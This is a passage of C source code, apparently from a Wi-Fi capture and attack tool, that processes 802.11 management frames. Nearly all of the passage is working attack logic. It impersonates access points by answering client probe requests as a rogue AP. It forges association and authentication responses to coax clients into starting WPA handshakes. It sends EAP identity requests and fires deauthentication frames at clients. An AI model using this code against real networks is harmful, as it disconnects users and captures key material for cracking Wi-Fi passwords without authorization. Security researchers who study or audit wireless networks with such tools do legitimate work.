1) && (macfrx->from_ds == 0)) { if((((timestamp -lastauthtimestamp) <= eapoltimeoutvalue) || ((lastauthkeyver == 0) && ((timestamp -lastauthtimestamp) <= eapoleaptimeoutvalue))) && (memcmp(&lastauthap, macfrx->addr1, 6) == 0)) { send_ack(); if(lastauthkeyver == 2) send_m1_wpa2(); else if(lastauthkeyver == 1) send_m1_wpa1(); return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if((zeiger->status &FILTERED) == FILTERED) return; zeiger->timestamp = timestamp; if(memcmp(&mac_null, zeiger->client, 6) == 0) zeiger->count = 0; memcpy(zeiger->client, macfrx->addr2, 6); return; } } return; } /*===========================================================================*/ static inline void process80211deauth() { static ownlist_t *zeiger; if((macfrx->to_ds == 1) && (macfrx->from_ds == 0)) { if(memcmp(&lastauthap, macfrx->addr1, 6) != 0) return; if((lastauthkeyver == 0) && ((timestamp -lastauthtimestamp) > eapoleaptimeoutvalue)) return; if((lastauthkeyver > 0) && ((timestamp -lastauthtimestamp) > eapoltimeoutvalue)) return; send_ack(); for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if(memcmp(zeiger->client, macfrx->addr2, 6) != 0) continue; if(zeiger->eapctx.tlstun == true) { SSL_shutdown(eaptlsctx->ssl); SSL_free(eaptlsctx->ssl); eaptlsctx->ssl = NULL; zeiger->eapctx.tlstun = false; } } } return; } /*===========================================================================*/ /*===========================================================================*/ static inline void process80211reassociation_resp() { static macessidlist_t *zeiger; if(payloadlen < ASSOCIATIONRESPFRAME_SIZE) return; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &FILTERED) == FILTERED) return; if((zeiger->status &AP_REASSOC_RESP) != AP_REASSOC_RESP) { zeiger->status |= AP_REASSOC_RESP; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); } return; } memset(zeiger, 0, MACESSIDLIST_SIZE); zeiger->timestamp = timestamp; zeiger->status = AP_REASSOC_RESP; memcpy(zeiger->ap, macfrx->addr2, 6); if(filtermode != 0) { if(setapfilter(zeiger) == true) { qsort(aplist, zeiger -aplist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); qsort(aplist, zeiger -aplist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } /*===========================================================================*/ static inline void process80211reassociation_req() { static uint8_t *clientinfoptr; static uint16_t clientinfolen; static ownlist_t *zeiger; static tags_t tags; clientinfoptr = payloadptr +CAPABILITIESREQSTA_SIZE; clientinfolen = payloadlen -CAPABILITIESREQSTA_SIZE; if(clientinfolen < IETAG_SIZE) return; for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if(memcmp(zeiger->client, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; gettags(clientinfolen, clientinfoptr, &tags); if((tags.essidlen != 0) && (tags.essid[0] != 0)) { zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); } if(zeiger->status >= OW_M2M3) return; if((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) { if(((tags.akm &TAK_PSK) == TAK_PSK) || ((tags.akm &TAK_PSKSHA256) == TAK_PSKSHA256)) { if((tags.kdversion &KV_RSNIE) == KV_RSNIE) { send_ack(); send_reassociation_resp(); memcpy(&lastauthap, macfrx->addr1, 6); memcpy(&lastauthclient, macfrx->addr2, 6); lastauthtimestamp = timestamp; lastauthkeyver = 2; } else if((tags.kdversion &KV_WPAIE) == KV_WPAIE) { send_ack(); send_reassociation_resp(); memcpy(&lastauthap, macfrx->addr1, 6); memcpy(&lastauthclient, macfrx->addr2, 6); lastauthtimestamp = timestamp; lastauthkeyver = 1; } } } if((zeiger->status &OW_REASSOC) != OW_REASSOC) { zeiger->status |= OW_REASSOC; gettags(clientinfolen, clientinfoptr, &tags); zeiger->timestamp = timestamp; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_ASSOCIATION) == STATUS_ASSOCIATION) printown(zeiger, "REASSOCIATION"); } return; } memset(zeiger, 0, OWNLIST_SIZE); gettags(clientinfolen, clientinfoptr, &tags); zeiger->timestamp = timestamp; zeiger->status = OW_REASSOC; memcpy(zeiger->ap, macfrx->addr1, 6); memcpy(zeiger->client, macfrx->addr2, 6); zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); if(filtermode != 0) { if(setclientfilter(zeiger) == true) { qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } } if((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) { if(((tags.akm &TAK_PSK) == TAK_PSK) || ((tags.akm &TAK_PSKSHA256) == TAK_PSKSHA256)) { if((tags.kdversion &KV_RSNIE) == KV_RSNIE) { send_ack(); send_reassociation_resp(); memcpy(&lastauthap, macfrx->addr1, 6); memcpy(&lastauthclient, macfrx->addr2, 6); lastauthtimestamp = timestamp; lastauthkeyver = 2; } else if((tags.kdversion &KV_WPAIE) == KV_WPAIE) { send_ack(); send_reassociation_resp(); memcpy(&lastauthap, macfrx->addr1, 6); memcpy(&lastauthclient, macfrx->addr2, 6); lastauthtimestamp = timestamp; lastauthkeyver = 1; } } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_ASSOCIATION) == STATUS_ASSOCIATION) printown(zeiger, "REASSOCIATION"); qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } /*===========================================================================*/ /*===========================================================================*/ static inline void process80211association_resp() { static macessidlist_t *zeiger; if(memcmp(&mac_myclient, macfrx->addr1, 6) == 0) send_ack(); if(payloadlen < ASSOCIATIONRESPFRAME_SIZE) return; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &FILTERED) == FILTERED) return; if((zeiger->status &AP_ASSOC_RESP) != AP_ASSOC_RESP) { zeiger->status |= AP_ASSOC_RESP; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); } return; } memset(zeiger, 0, MACESSIDLIST_SIZE); zeiger->timestamp = timestamp; zeiger->status = AP_ASSOC_RESP; memcpy(zeiger->ap, macfrx->addr2, 6); if(filtermode != 0) { if(setapfilter(zeiger) == true) { qsort(aplist, zeiger -aplist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); qsort(aplist, zeiger -aplist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } /*===========================================================================*/ static inline void process80211association_req() { static uint8_t *clientinfoptr; static uint16_t clientinfolen; static ownlist_t *zeiger; static tags_t tags; clientinfoptr = payloadptr +CAPABILITIESSTA_SIZE; clientinfolen = payloadlen -CAPABILITIESSTA_SIZE; if(clientinfolen < IETAG_SIZE) return; for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if(memcmp(zeiger->client, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; gettags(clientinfolen, clientinfoptr, &tags); if(eapreqflag == true && ((zeiger->essidlen != tags.essidlen) || (memcmp(zeiger->essid, tags.essid, zeiger->essidlen) != 0))) { zeiger->eapctx.reqstate = 0; } if((tags.essidlen != 0) && (tags.essid[0] != 0)) { zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); } if((zeiger->status >= OW_M1M2ROGUE) && (eapreqflag == false)) return; if(((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) && (zeiger->status < OW_M1M2ROGUE)) { if(((tags.akm &TAK_PSK) == TAK_PSK) || ((tags.akm &TAK_PSKSHA256) == TAK_PSKSHA256)) { if((tags.kdversion &KV_RSNIE) == KV_RSNIE) { send_ack(); send_association_resp(); memcpy(&lastauthap, macfrx->addr1, 6); memcpy(&lastauthclient, macfrx->addr2, 6); lastauthtimestamp = timestamp; lastauthkeyver = 2; } else if((tags.kdversion &KV_WPAIE) == KV_WPAIE) { send_ack(); send_association_resp(); memcpy(&lastauthap, macfrx->addr1,6); memcpy(&lastauthclient, macfrx->addr2,6); lastauthtimestamp = timestamp; lastauthkeyver = 1; } } } if(((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) && ((zeiger->status < OW_EAP_RESP) || ((eapreqflag == true) && (zeiger->eapctx.reqstate < eapreqentries)))) { if(((tags.akm &TAK_PMKSA) == TAK_PMKSA) || ((tags.akm &TAK_PMKSA256) == TAK_PMKSA256)) { if((tags.kdversion &KV_RSNIE) == KV_RSNIE) { if((eapreqflag == true) && (zeiger->eapctx.reqstate == eapreqentries)) return; send_ack(); if((timestamp -lastauthtimestamp) <= PACKET_RESEND_TIMER_USEC) return; send_association_resp(); zeiger->eapctx.id = -1; send_eap_request_id(&zeiger->eapctx); memcpy(&lastauthap, macfrx->addr1, 6); memcpy(&lastauthclient, macfrx->addr2, 6); lastauthtimestamp = timestamp; lastauthkeyver = 0; } else if((tags.kdversion &KV_WPAIE) == KV_WPAIE) { if((eapreqflag == true) && (zeiger->eapctx.reqstate == eapreqentries)) return; send_ack(); if((timestamp -lastauthtimestamp) <= PACKET_RESEND_TIMER_USEC) return; send_association_resp(); zeiger->eapctx.id = -1; send_eap_request_id(&zeiger->eapctx); memcpy(&lastauthap, macfrx->addr1,6); memcpy(&lastauthclient, macfrx->addr2,6); lastauthtimestamp = timestamp; lastauthkeyver = 0; } } } if((zeiger->status &OW_ASSOC) != OW_ASSOC) { zeiger->status |= OW_ASSOC; gettags(clientinfolen, clientinfoptr, &tags); zeiger->timestamp = timestamp; zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_ASSOCIATION) == STATUS_ASSOCIATION) printown(zeiger, "ASSOCIATION"); } return; } memset(zeiger, 0, OWNLIST_SIZE); gettags(clientinfolen, clientinfoptr, &tags); zeiger->timestamp = timestamp; zeiger->status = OW_ASSOC; memcpy(zeiger->ap, macfrx->addr1, 6); memcpy(zeiger->client, macfrx->addr2, 6); zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); if(filtermode != 0) { if(setclientfilter(zeiger) == true) { qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } } if((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) { if(((tags.akm &TAK_PSK) == TAK_PSK) || ((tags.akm &TAK_PSKSHA256) == TAK_PSKSHA256)) { if((tags.kdversion &KV_RSNIE) == KV_RSNIE) { send_ack(); send_association_resp(); memcpy(&lastauthap, macfrx->addr1, 6); memcpy(&lastauthclient, macfrx->addr2, 6); lastauthtimestamp = timestamp; lastauthkeyver = 2; } else if((tags.kdversion &KV_WPAIE) == KV_WPAIE) { send_ack(); send_association_resp(); memcpy(&lastauthap, macfrx->addr1, 6); memcpy(&lastauthclient, macfrx->addr2, 6); lastauthtimestamp = timestamp; lastauthkeyver = 1; } } if(((tags.akm &TAK_PMKSA) == TAK_PMKSA) || ((tags.akm &TAK_PMKSA256) == TAK_PMKSA256)) { if((tags.kdversion &KV_RSNIE) == KV_RSNIE) { send_ack(); send_association_resp(); zeiger->eapctx.id = -1; send_eap_request_id(&zeiger->eapctx); memcpy(&lastauthap, macfrx->addr1, 6); memcpy(&lastauthclient, macfrx->addr2, 6); lastauthtimestamp = timestamp; lastauthkeyver = 0; } else if((tags.kdversion &KV_WPAIE) == KV_WPAIE) { send_ack(); send_association_resp(); zeiger->eapctx.id = -1; send_eap_request_id(&zeiger->eapctx); memcpy(&lastauthap, macfrx->addr1,6); memcpy(&lastauthclient, macfrx->addr2,6); lastauthtimestamp = timestamp; lastauthkeyver = 0; } } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_ASSOCIATION) == STATUS_ASSOCIATION) printown(zeiger, "ASSOCIATION"); qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } /*===========================================================================*/ /*===========================================================================*/ static inline void process80211authentication_sae() { static authf_t *auth; if((attackstatus &DISABLE_AP_ATTACKS) == DISABLE_AP_ATTACKS) return; if((attackstatus &DISABLE_CLIENT_ATTACKS) == DISABLE_CLIENT_ATTACKS) return; auth = (authf_t*)payloadptr; if(ntohs(auth->sequence) == 1) { send_ack(); if(memcmp(macfrx->addr1, macfrx->addr3, 6) == 0) send_authentication_sae_commit(macfrx->addr2, macfrx->addr1); else if(memcmp(macfrx->addr2, macfrx->addr3, 6) == 0) send_authentication_sae_confirm(macfrx->addr2, macfrx->addr1); } if(ntohs(auth->sequence) == 2) { send_ack(); if(memcmp(macfrx->addr1, macfrx->addr3, 6) == 0) send_authentication_sae_confirm(macfrx->addr2 ,macfrx->addr1); } return; } /*===========================================================================*/ static inline void process80211authentication_resp() { static authf_t *auth; static macessidlist_t *zeiger; auth = (authf_t*)payloadptr; if(payloadlen < AUTHENTICATIONFRAME_SIZE) return; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &FILTERED) == FILTERED) return; if((zeiger->essidlen != 0) && (zeiger->essid[0] != 0) && (auth->algorithm == OPEN_SYSTEM) && (memcmp(&mac_myclient, macfrx->addr1, 6) == 0)) { send_ack(); if((zeiger->kdversion &KV_RSNIE) == KV_RSNIE) send_association_req_wpa2(zeiger); else if((zeiger->kdversion &KV_WPAIE) == KV_WPAIE) send_association_req_wpa1(zeiger); } if((zeiger->status &AP_AUTH_RESP) != AP_AUTH_RESP) { zeiger->status |= AP_AUTH_RESP; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); } return; } memset(zeiger, 0, MACESSIDLIST_SIZE); zeiger->timestamp = timestamp; zeiger->status = AP_AUTH_RESP; memcpy(zeiger->ap, macfrx->addr2, 6); if(filtermode != 0) { if(setapfilter(zeiger) == true) { qsort(aplist, zeiger -aplist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); qsort(aplist, zeiger -aplist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } /*===========================================================================*/ static inline void process80211authentication_req() { static authf_t *auth; static ownlist_t *zeiger; auth = (authf_t*)payloadptr; if(payloadlen < AUTHENTICATIONFRAME_SIZE) return; for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if(memcmp(zeiger->client, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &FILTERED) == FILTERED) return; if(((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) && ((zeiger->status < OW_M1M2ROGUE) || ((eapreqflag == true) && (zeiger->eapctx.reqstate < eapreqentries)))) { if(auth->algorithm == OPEN_SYSTEM) { send_ack(); send_authentication_resp_opensystem(); } } if((zeiger->status &OW_AUTH) != OW_AUTH) { zeiger->status |= OW_AUTH; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_AUTHENTICATION) == STATUS_AUTHENTICATION) printown(zeiger, "AUTHENTICATION"); } return; } memset(zeiger, 0, OWNLIST_SIZE); zeiger->timestamp = timestamp; zeiger->status = OW_AUTH; memcpy(zeiger->ap, macfrx->addr1, 6); memcpy(zeiger->client, macfrx->addr2, 6); if(filtermode != 0) { if(setclientfilter(zeiger) == true) { qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } } if((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) { if(auth->algorithm == OPEN_SYSTEM) { send_ack(); send_authentication_resp_opensystem(); } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_AUTHENTICATION) == STATUS_AUTHENTICATION) printown(zeiger, "AUTHENTICATION"); qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } /*===========================================================================*/ /*===========================================================================*/ static inline void process80211probe_req_directed() { static macessidlist_t *zeiger; static tags_t tags; if(memcmp(&mac_myapopen, macfrx->addr1, 6) == 0) { if((attackstatus &SILENT) != SILENT) send_probe_resp_open(); } if(payloadlen < IETAG_SIZE) return; gettags(payloadlen, payloadptr, &tags); if((tags.essidlen == 0) || (tags.essid[0] == 0)) return; for(zeiger = rglist; zeiger < rglist +RGLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr1, 6) != 0) continue; if(zeiger->essidlen != tags.essidlen) continue; if(memcmp(zeiger->essid, tags.essid, tags.essidlen) != 0) continue; zeiger->timestamp = timestamp; if((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) send_probe_resp(macfrx->addr2, zeiger); return; } memset(zeiger, 0, MACESSIDLIST_SIZE); zeiger->timestamp = timestamp; memcpy(zeiger->ap, macfrx->addr1, 6); zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); if((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) send_probe_resp(macfrx->addr2, zeiger); memcpy(&mac_myprclient, macfrx->addr2, 6); if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_ROGUE) == STATUS_ROGUE) printstatusap(macfrx->addr2, zeiger, "ROGUE PROBEREQPONSE"); qsort(rglist, zeiger -rglist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } /*===========================================================================*/ static inline void process80211probe_req() { static macessidlist_t *zeiger; static tags_t tags; if(payloadlen < IETAG_SIZE) return; gettags(payloadlen, payloadptr, &tags); if((tags.essidlen == 0) || (tags.essid[0] == 0)) return; for(zeiger = rglist; zeiger < rglist +RGLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(zeiger->essidlen != tags.essidlen) continue; if(memcmp(zeiger->essid, tags.essid, tags.essidlen) != 0) continue; zeiger->timestamp = timestamp; if((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) send_probe_resp(macfrx->addr2, zeiger); return; } memset(zeiger, 0, MACESSIDLIST_SIZE); zeiger->timestamp = timestamp; memcpy(zeiger->ap, &mac_myap, 3); zeiger->ap[3] = (mynic_ap >> 16) & 0xff; zeiger->ap[4] = (mynic_ap >> 8) & 0xff; zeiger->ap[5] = mynic_ap & 0xff; mynic_ap++; zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); if((attackstatus &DISABLE_CLIENT_ATTACKS) != DISABLE_CLIENT_ATTACKS) send_probe_resp(macfrx->addr2, zeiger); memcpy(&mac_myprclient, macfrx->addr2, 6); if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((statusout &STATUS_ROGUE) == STATUS_ROGUE) printstatusap(macfrx->addr2, zeiger, "ROGUE PROBERESPONSE"); qsort(rglist, zeiger -rglist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } /*===========================================================================*/ static inline void process80211probe_resp() { static int apinfolen; static uint8_t *apinfoptr; static macessidlist_t *zeiger; static tags_t tags; if(payloadlen < CAPABILITIESAP_SIZE +IETAG_SIZE) return; apinfoptr = payloadptr +CAPABILITIESAP_SIZE; apinfolen = payloadlen -CAPABILITIESAP_SIZE; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; if((zeiger->status &FILTERED) == FILTERED) return; if((zeiger->essidlen == 0) || (zeiger->essid[0] == 0)) { gettags(apinfolen, apinfoptr, &tags); if((tags.essidlen == 0) || (tags.essid[0] == 0)) return; zeiger->timestamp = timestamp; memcpy(zeiger->ap, macfrx->addr2, 6); if(tags.channel != 0) zeiger->channel = tags.channel; else zeiger->channel = ptrfscanlist->channel; zeiger->kdversion = tags.kdversion; zeiger->groupcipher = tags.groupcipher; zeiger->cipher = tags.cipher; zeiger->akm = tags.akm; zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); } if((zeiger->status &AP_PROBE_RESP) != AP_PROBE_RESP) { zeiger->status |= AP_PROBE_RESP; if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); if((statusout &STATUS_AP_BEACON_PROBE) == STATUS_AP_BEACON_PROBE) printstatusap(macfrx->addr1, zeiger, "PROBERESPONSE"); } return; } memset(zeiger, 0, MACESSIDLIST_SIZE); gettags(apinfolen, apinfoptr, &tags); zeiger->timestamp = timestamp; zeiger->status = AP_PROBE_RESP; memcpy(zeiger->ap, macfrx->addr2, 6); if(tags.channel != 0) zeiger->channel = tags.channel; else zeiger->channel = ptrfscanlist->channel; zeiger->kdversion = tags.kdversion; zeiger->groupcipher = tags.groupcipher; zeiger->cipher = tags.cipher; zeiger->akm = tags.akm; zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); if(filtermode != 0) { if(setapfilter(zeiger) == true) { qsort(aplist, zeiger -aplist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); if((statusout &STATUS_AP_BEACON_PROBE) == STATUS_AP_BEACON_PROBE) printstatusap(macfrx->addr1, zeiger, "PROBERESPONSE"); qsort(aplist, zeiger -aplist +1, MACESSIDLIST_SIZE, sort_macessidlist_by_time); return; } /*===========================================================================*/ static inline void processpagid(uint8_t *pagidptr) { static pagidlist_t *zeiger; static char timestring[16]; for(zeiger = pagidlist; zeiger < pagidlist +PAGIDLIST_MAX -1; zeiger++) { if(zeiger->id[0] == 0) break; if(memcmp(zeiger->id, pagidptr, 64) == 0) return; } zeiger->timestamp = timestamp; memcpy(zeiger->id, pagidptr, 64); if(((statusout &STATUS_AP_BEACON_PROBE) == STATUS_AP_BEACON_PROBE) || ((statusout &STATUS_ROGUE) == STATUS_ROGUE) || ((statusout &STATUS_ASSOCIATION) == STATUS_ASSOCIATION)) { strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x [PWNAGOTCHI ID:%.*s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, macfrx->addr2[0], macfrx->addr2[1], macfrx->addr2[2], macfrx->addr2[3], macfrx->addr2[4], macfrx->addr2[5], 64, zeiger->id); else if(ptrfscanlist->channel >= 10) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x [PWNAGOTCHI ID:%.*s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, macfrx->addr2[0], macfrx->addr2[1], macfrx->addr2[2], macfrx->addr2[3], macfrx->addr2[4], macfrx->addr2[5], 64, zeiger->id); else snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x [PWNAGOTCHI ID:%.*s]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, macfrx->addr2[0], macfrx->addr2[1], macfrx->addr2[2], macfrx->addr2[3], macfrx->addr2[4], macfrx->addr2[5], 64, zeiger->id); if(((statusout &STATUS_SERVER) == STATUS_SERVER) && (fd_socket_mcsrv > 0)) serversendstatus(servermsg, strlen(servermsg)); else printf("%s", servermsg); } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if(fh_nmea != NULL) writegpwpl(macfrx->addr2); qsort(pagidlist, PAGIDLIST_MAX, PAGIDLIST_SIZE, sort_pagidlist_by_time); return; } /*===========================================================================*/ static inline bool processpag(int vendorlen, uint8_t *ieptr) { static int c, p; static const uint8_t mac_pwag[6] = { 0xde, 0xad, 0xbe, 0xef, 0xde, 0xad }; if(ieptr[1] != 0xff) return false; if(vendorlen <= 0x78) return false; if(memcmp(&mac_pwag, macfrx->addr2, 6) != 0) return false; for(p = 2; p < vendorlen -75 ; p++) { if(memcmp(&ieptr[p], "identity", 8) == 0) { for(c = 0; c < 64; c++) { if(!isxdigit(ieptr[p +11 +c])) return false; } processpagid(ieptr +p +11); return true; } } return false; } /*===========================================================================*/ static inline void process80211beacon() { static int apinfolen; static uint8_t *apinfoptr; static macessidlist_t *zeiger; static tags_t tags; if(payloadlen < CAPABILITIESAP_SIZE +IETAG_SIZE) return; apinfoptr = payloadptr +CAPABILITIESAP_SIZE; apinfolen = payloadlen -CAPABILITIESAP_SIZE; if(apinfoptr[0] == TAG_PAG) { if(processpag(apinfolen, apinfoptr) == true) return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if(memcmp(zeiger->ap, macfrx->addr2, 6) != 0) continue; zeiger->timestamp = timestamp; zeiger->count +=1; if((zeiger->status &FILTERED) == FILTERED) return; if((zeiger->count %600) == 0) { gettags(apinfolen, apinfoptr, &tags); if((tags.essidlen == 0) || (tags.essid[0] == 0)) { if((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS) send_proberequest_undirected_broadcast(); return; } zeiger->timestamp = timestamp; memcpy(zeiger->ap, macfrx->addr2, 6); if(tags.channel != 0) zeiger->channel = tags.channel; else zeiger->channel = ptrfscanlist->channel; zeiger->kdversion = tags.kdversion; zeiger->groupcipher = tags.groupcipher; zeiger->cipher = tags.cipher; zeiger->akm = tags.akm; zeiger->essidlen = tags.essidlen; memcpy(zeiger->essid, tags.essid, tags.essidlen); } if((infinityflag == true) && ((attackstatus &DISABLE_AP_ATTACKS) != DISABLE_AP_ATTACKS)) { if(((zeiger->akm &TAK_PSK) == TAK_PSK) || ((zeiger->akm &TAK_PSKSHA256) == TAK_PSKSHA256)) { if(((zeiger->kdversion &KV_RSNIE) == KV_RSNIE) || ((zeiger->kdversion &KV_WPAIE) == KV_WPAIE)) send_authentication_req_opensystem(macfrx->addr2); } if((zeiger->kdversion &KV_RSNIE) == KV_RSNIE) send_reassociation_req_wpa2(zeiger); else if((zeiger->kdversion &KV_WPAIE) == KV_WPAIE) send_reassociation_req_wpa1(zeiger); if(memcmp(&mac_null, zeiger->client, 6) != 0) send_deauthentication2client(zeiger->client, zeiger->ap, reasoncode); send_deauthentication2client(macfrx->addr1, macfrx->addr2, reasoncode); } if((ptrfscanlist->channel == zeiger->channel) && (zeiger->status < AP_M2M3) && (zeiger->count <= attackstopcount)) { if((attackstatus &DISABLE_AP_ATTACKS) != 